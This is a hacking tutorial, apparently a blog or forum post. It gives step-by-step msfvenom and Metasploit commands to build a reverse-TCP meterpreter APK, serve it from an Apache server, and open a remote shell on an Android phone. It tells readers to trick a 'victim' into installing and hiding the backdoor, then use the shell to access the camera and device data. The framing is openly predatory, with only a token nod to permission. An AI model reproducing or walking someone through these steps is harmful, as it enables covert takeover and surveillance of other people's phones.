This is a 100% working tutorial of the Android hack where you can have the backdoor installed in any android device and have complete access to the device. I mean complete access, no kidding!
I am going to tell you the process where you can easily make the backdoor and when the victim clicks on it, you get the complete access.
This is not some Automated tool tutorial where you can click a button and you get access. Nope!
You gotta know basic linux usage and some of your common sense where you can social engineer your victim.
Disclaimer: The contributors do not assume any responsibility for the use of this tool
Warning: It is advisable to not use your own/primary account when using this tool.
What you need:
A linux machine and victim ofcourse
I guess you have your terminal opened up:
- Make a note of your IP add. (ifconfig)
- Enter the following string of code and replace the terms.
// msfvenom -p android/meterpreter/reverse_tcp LHOST= “YOUR OWN IP HERE” LPORT=4444 -R > “whatevername.apk”
The above string have a lot of info if you can decode. The backdoor is created and hosted on a server all at the same time. Give it a sec to make it up.
3. Move the file to /var/www/html // (mv whatevername.apk /var/www/html)
4. cd into /var/www/html
5. enter :service apache2 start (this will start the server)
IN THE VICTIM DEVICE:
To access the device you need to use your social engineering techniques to make the person install the backdoor or apk here. You can change the name of file or sweet talk them to install it and click on the apk.
- To download the apk
Enter into browser from the Android device and go to : YOUR_IP_ADDRESS/whatevername.apk ( hope you get this one)
- That will download the apk. You may need to install it and click on it. You can hide it using android inside built-in features.
BACK TO HACKER’S MACHINE:
- Enter : msfconsole -q ///( to access the payload we injected)
- enter: use exploit/multi/handler
- then: set payload android/meterpreter/reverse_tcp
- set LHOST “YOUR IP”
- set LPORT 4444
- show options (this is only to check if you have set everything up or not)
- then just enter : exploit
Thats it!! You got complete access of the Android device through the backdoor which we installed.
You can enter : help , that will show you the list of options you can perform to remote control the device.
- You can grab uuid, sysinfo, webcam lists, take a snap and a lot lot more. Thats why i termed it as ADVANCED BACKDOOR.
- I’ve tested this on the latest updated Android devices. It works if you can get the commands right. Its so crazy that this exploit still works on even latest devices.
Be careful which making the bait and making your prey eat the bait.
Hack yourself and test it on you, and hack you friends or with permission.